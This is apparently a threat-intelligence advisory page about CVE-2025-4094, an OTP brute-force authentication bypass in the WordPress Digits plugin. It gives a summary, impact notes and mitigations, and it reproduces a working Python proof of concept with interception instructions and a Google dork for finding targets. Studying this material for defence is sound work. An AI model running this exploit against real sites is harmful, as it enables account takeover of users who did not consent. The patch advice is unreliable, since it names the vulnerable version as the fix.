WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
AI Analysis
Technical Summary
The WordPress Digits Plugin version 8.4.6.1 and earlier contains a critical vulnerability that allows an attacker to bypass authentication mechanisms by brute forcing the One-Time Password (OTP) used in login or password reset flows. This vulnerability arises due to the absence of rate limiting on OTP verification attempts, enabling an attacker to systematically try all possible OTP combinations (e.g., 4-digit or 6-digit codes) until the correct one is found. The exploit targets the "Forgot Password" flow but can also be applied to the registration process. The vulnerability is classified under CWE-287 (Improper Authentication) and is associated with broken authentication issues as per OWASP Top 10 (A2). The provided proof-of-concept exploit is implemented in Python and automates the brute force attack by sending HTTP POST requests to the vulnerable WordPress endpoint with varying OTP values. The script monitors responses for a success indicator to identify the correct OTP, thereby allowing unauthorized access or password reset without valid credentials. The vulnerability has been assigned CVE-2025-4094 and carries a CVSS v3.1 score of 9.8 (critical) according to the exploit author, although no official CVSS score is provided in the source data. The exploit requires no user interaction beyond intercepting a legitimate OTP verification request and does not require prior authentication, making it highly exploitable. The attack can compromise confidentiality and integrity by allowing unauthorized account access and potential account takeover, and it impacts availability by undermining the authentication mechanism's reliability.
Potential Impact
European organizations using WordPress with the Digits plugin version 8.4.6.1 or earlier are at significant risk of unauthorized access to user accounts, including administrative accounts if OTP-based authentication or password reset is enabled. This can lead to data breaches, unauthorized data modification, and potential lateral movement within affected networks. The compromise of user accounts can also facilitate phishing, fraud, and further exploitation of organizational resources. Given WordPress's widespread use in Europe for websites ranging from small businesses to government portals, the impact can be broad and severe. Organizations handling sensitive user data, financial information, or critical infrastructure are particularly vulnerable. The lack of rate limiting means automated attacks can be conducted at scale, increasing the likelihood of successful exploitation. Additionally, the attack undermines user trust and can cause reputational damage. The exploit's automation capability lowers the skill barrier for attackers, increasing the threat landscape. Without mitigation, attackers can bypass multi-factor authentication protections, severely weakening overall security postures.
Mitigation Recommendations
1. Immediate update or patching of the Digits plugin to version 8.4.6.1 or later where the vulnerability is fixed. If an official patch is unavailable, disable the plugin or the OTP feature temporarily. 2. Implement server-side rate limiting on OTP verification endpoints to restrict the number of attempts per user or IP address within a defined time window. 3. Employ account lockout mechanisms after a defined number of failed OTP attempts to prevent brute force attacks. 4. Enhance logging and monitoring to detect unusual OTP verification request patterns indicative of brute force attempts. 5. Use CAPTCHA or other challenge-response tests on OTP submission forms to hinder automated attacks. 6. Consider integrating additional authentication factors beyond OTP, such as hardware tokens or biometric verification. 7. For organizations unable to immediately patch, implement Web Application Firewall (WAF) rules to detect and block rapid sequential OTP verification attempts. 8. Educate users about the risks and encourage strong, unique passwords alongside OTP usage. 9. Regularly audit and review plugin usage and configurations to ensure compliance with security best practices. 10. Coordinate with hosting providers to monitor and mitigate large-scale brute force activities targeting WordPress sites.
Affected Countries
Germany, United Kingdom, France, Italy, Spain, Netherlands, Poland, Sweden, Belgium, Austria
Indicators of Compromise
- exploit-code: # Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing # Google Dork: inurl:/wp-content/plugins/digits/ # Date: 2025-04-30 # Exploit Author: Saleh Tarawneh # Vendor Homepage: https://digits.unitedover.com/ # Version: < 8.4.6.1 # CVE : CVE-2025-4094 """ The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting. An attacker can exploit this to bypass authentication or password reset by iterating over possible OTP values. This PoC targets the "Forgot Password" flow and automates the attack, which is the same concept that is valid for the registration flow. CWE-287: Improper Authentication CVSS v3.1: 9.8 (Critical) OWASP A2: Broken Authentication [Instructions] 1. Use a tool like Burp Suite or your browser’s developer tools to intercept the OTP verification request. 2. Copy the exact request parameters 3. Replace the placeholder values in the script with real data from the intercepted request. 4. Run the script to brute-force 4-digit OTPs (0000 to 9999) or you can change it to 6-digit. [Alternative Method – Burp Suite Pro] If you have Burp Suite Pro, you can perform the OTP brute-force attack manually: 1. Intercept the OTP request using Burp Proxy. 2. Send the request to Intruder. 3. Mark the `sms_otp` parameter as the payload position. 4. Load a payload list from `000000` to `999999` (for 6-digit OTPs). 5. Start the attack and monitor responses for a different status code, length, or success message. """ import requests def brute(otp): url = "https://example.com/wp-admin/admin-ajax.php" data = { # Replace with targets data "login_digt_countrycode": "+", "digits_phone": "000000000", "action_type": "phone", "sms_otp": otp, "otp_step_1": "1", "instance_id": "xxxxxxx", "action": "digits_forms_ajax", "type": "forgot", "forgot_pass_method": "sms_otp", "digits": "1", "digits_redirect_page": "//example.com/", "digits_form": "xxxxxxxx", "_wp_http_referer": "/?login=true" } headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Referer": "https://example.com/?login=true" # Replace with intercepted referer } response = requests.post(url, data=data, headers=headers) if '"success":true' in response.text: print(f"[+] OTP FOUND: {otp}") exit() def main(): for otp in range(0, 10000): # range(0, 1000000): for 6-digit otp_str = f"{otp:04d}" # {otp:06d} for 6-digit print(f"[*] Trying OTP: {otp_str}") brute(otp_str) if __name__ == "__main__": main()
WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
Description
WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
AI-Powered Analysis
Technical Analysis
The WordPress Digits Plugin version 8.4.6.1 and earlier contains a critical vulnerability that allows an attacker to bypass authentication mechanisms by brute forcing the One-Time Password (OTP) used in login or password reset flows. This vulnerability arises due to the absence of rate limiting on OTP verification attempts, enabling an attacker to systematically try all possible OTP combinations (e.g., 4-digit or 6-digit codes) until the correct one is found. The exploit targets the "Forgot Password" flow but can also be applied to the registration process. The vulnerability is classified under CWE-287 (Improper Authentication) and is associated with broken authentication issues as per OWASP Top 10 (A2). The provided proof-of-concept exploit is implemented in Python and automates the brute force attack by sending HTTP POST requests to the vulnerable WordPress endpoint with varying OTP values. The script monitors responses for a success indicator to identify the correct OTP, thereby allowing unauthorized access or password reset without valid credentials. The vulnerability has been assigned CVE-2025-4094 and carries a CVSS v3.1 score of 9.8 (critical) according to the exploit author, although no official CVSS score is provided in the source data. The exploit requires no user interaction beyond intercepting a legitimate OTP verification request and does not require prior authentication, making it highly exploitable. The attack can compromise confidentiality and integrity by allowing unauthorized account access and potential account takeover, and it impacts availability by undermining the authentication mechanism's reliability.
Potential Impact
European organizations using WordPress with the Digits plugin version 8.4.6.1 or earlier are at significant risk of unauthorized access to user accounts, including administrative accounts if OTP-based authentication or password reset is enabled. This can lead to data breaches, unauthorized data modification, and potential lateral movement within affected networks. The compromise of user accounts can also facilitate phishing, fraud, and further exploitation of organizational resources. Given WordPress's widespread use in Europe for websites ranging from small businesses to government portals, the impact can be broad and severe. Organizations handling sensitive user data, financial information, or critical infrastructure are particularly vulnerable. The lack of rate limiting means automated attacks can be conducted at scale, increasing the likelihood of successful exploitation. Additionally, the attack undermines user trust and can cause reputational damage. The exploit's automation capability lowers the skill barrier for attackers, increasing the threat landscape. Without mitigation, attackers can bypass multi-factor authentication protections, severely weakening overall security postures.
Mitigation Recommendations
1. Immediate update or patching of the Digits plugin to version 8.4.6.1 or later where the vulnerability is fixed. If an official patch is unavailable, disable the plugin or the OTP feature temporarily. 2. Implement server-side rate limiting on OTP verification endpoints to restrict the number of attempts per user or IP address within a defined time window. 3. Employ account lockout mechanisms after a defined number of failed OTP attempts to prevent brute force attacks. 4. Enhance logging and monitoring to detect unusual OTP verification request patterns indicative of brute force attempts. 5. Use CAPTCHA or other challenge-response tests on OTP submission forms to hinder automated attacks. 6. Consider integrating additional authentication factors beyond OTP, such as hardware tokens or biometric verification. 7. For organizations unable to immediately patch, implement Web Application Firewall (WAF) rules to detect and block rapid sequential OTP verification attempts. 8. Educate users about the risks and encourage strong, unique passwords alongside OTP usage. 9. Regularly audit and review plugin usage and configurations to ensure compliance with security best practices. 10. Coordinate with hosting providers to monitor and mitigate large-scale brute force activities targeting WordPress sites.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52307
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing
# Exploit Title: WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing # Google Dork: inurl:/wp-content/plugins/digits/ # Date: 2025-04-30 # Exploit Author: Saleh Tarawneh # Vendor Homepage: https://digits.unitedover.com/ # Version: < 8.4.6.1 # CVE : CVE-2025-4094 """ The Digits plugin for WordPress prior to version 8.4.6.1 is vulnerable to OTP brute-force attacks due to missing rate limiting. An attacker can exploit this to bypass authentication or password reset by ite... (2380 more characters)
Threat ID: 68489d917e6d765d51d52a95
Added to database: 6/10/2025, 9:03:13 PM
Last enriched: 6/11/2025, 8:39:26 AM
Last updated: 8/17/2025, 8:46:41 PM
Views: 25
Related Threats
Researcher to release exploit for full auth bypass on FortiWeb
HighTop Israeli Cybersecurity Director Arrested in US Child Exploitation Sting
HighEncryptHub abuses Brave Support in new campaign exploiting MSC EvilTwin flaw
MediumMalicious JavaScript Injects Fullscreen Iframe On a WordPress Website
MediumU.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.